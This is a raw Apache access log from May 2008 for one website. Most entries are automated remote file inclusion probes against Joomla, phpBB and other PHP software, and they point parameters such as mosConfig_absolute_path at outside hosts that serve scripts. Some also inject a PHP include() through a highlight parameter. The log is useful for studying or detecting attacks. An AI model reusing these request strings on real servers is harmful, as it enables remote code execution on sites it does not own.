209.107.130.4 - - [16/May/2008:11:40:14 -0700] "GET //SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:40:17 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:40:18 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.2.66.132 - - [16/May/2008:11:40:30 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [16/May/2008:11:40:32 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:11:40:54 -0700] "GET /logs/access_080218.log//displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:41:34 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:41:34 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:11:41:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:11:41:40 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:41:43 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:41:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.806" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:11:41:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:11:41:58 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:42:06 -0700] "GET /logs/access_071118.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:42:06 -0700] "GET /logs/access_071210.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:42:25 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:42:25 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:42:26 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:11:42:30 -0700] "GET /mobileoffice/Picture_016.jpg HTTP/1.1" 200 632983 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:11:42:33 -0700] "GET /mobileoffice/Picture_013.jpg HTTP/1.1" 200 619028 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:42:35 -0700] "GET /logs/access_080103.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.84.31 - - [16/May/2008:11:42:40 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.100.17.158 - - [16/May/2008:11:42:42 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www12.asphost4free.com/redland/idi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
208.100.17.158 - - [16/May/2008:11:42:42 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www12.asphost4free.com/redland/idi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:42:47 -0700] "GET /logs/access_080331.log//language.inc.php?langs_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:42:48 -0700] "GET /logs/access_080214.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:43:11 -0700] "GET /logs/access_080104.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:43:14 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
189.2.66.132 - - [16/May/2008:11:43:15 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:43:18 -0700] "GET /logs/access_071219.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:43:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:43:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:43:45 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.255.251.85 - - [16/May/2008:11:43:51 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:43:51 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:43:52 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:44:11 -0700] "GET /logs//citywriter/head.php?path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:44:11 -0700] "GET //citywriter/head.php?path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:44:24 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:44:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:44:47 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:44:56 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
72.32.199.201 - - [16/May/2008:11:45:04 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.32.199.201 - - [16/May/2008:11:45:04 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:11:45:04 -0700] "GET /logs/index.php?var=http://www.diabeteszones.com/templates/fs-green/css/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:11:45:05 -0700] "GET /logs/index.php?var=http://www.diabeteszones.com/templates/fs-green/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:11:45:05 -0700] "GET /index.php?var=http://www.diabeteszones.com/templates/fs-green/css/sex.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
82.77.9.141 - - [16/May/2008:11:45:10 -0700] "GET /index.php?var=http://www.diabeteszones.com/templates/fs-green/css/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:45:11 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:45:15 -0700] "GET /logs/access_071211.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:45:31 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:45:41 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:45:42 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.111.159 - - [16/May/2008:11:46:11 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [16/May/2008:11:46:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.90.111.159 - - [16/May/2008:11:46:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:46:16 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:46:17 -0700] "GET //admin/index.php?o=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:46:17 -0700] "GET /logs//admin/index.php?o=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:46:56 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:11:46:59 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:11:47:04 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:11:47:06 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:47:07 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.29.231 - - [16/May/2008:11:47:20 -0700] "GET /retreat1/webcam/ HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:11:47:41 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.116.103.45 - - [16/May/2008:11:47:41 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.116.103.45 - - [16/May/2008:11:47:41 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.69.178.85 - - [16/May/2008:11:47:43 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:11:47:46 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:11:47:47 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
216.69.178.85 - - [16/May/2008:11:47:48 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
216.69.178.85 - - [16/May/2008:11:47:50 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 0 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:47:52 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:47:52 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:48:05 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:48:06 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:48:06 -0700] "GET //admin/index.php?o=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:48:06 -0700] "GET /logs//admin/index.php?o=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:11:48:08 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:11:48:10 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:11:48:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:48:23 -0700] "GET /logs/access_080120.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:11:48:23 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:11:48:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:11:48:29 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:11:48:41 -0700] "GET /logs/access_080327.log//displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:48:43 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:48:43 -0700] "GET //SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:48:53 -0700] "GET /logs/access_071223.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:48:54 -0700] "GET /logs/access.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:11:48:54 -0700] "GET //SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:11:48:55 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:49:00 -0700] "GET //SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:49:00 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:11:49:01 -0700] "GET //SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:11:49:01 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:11:49:04 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:49:06 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:49:06 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.115.80.2 - - [16/May/2008:11:49:07 -0700] "GET /browse.php/header.php?prefix=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
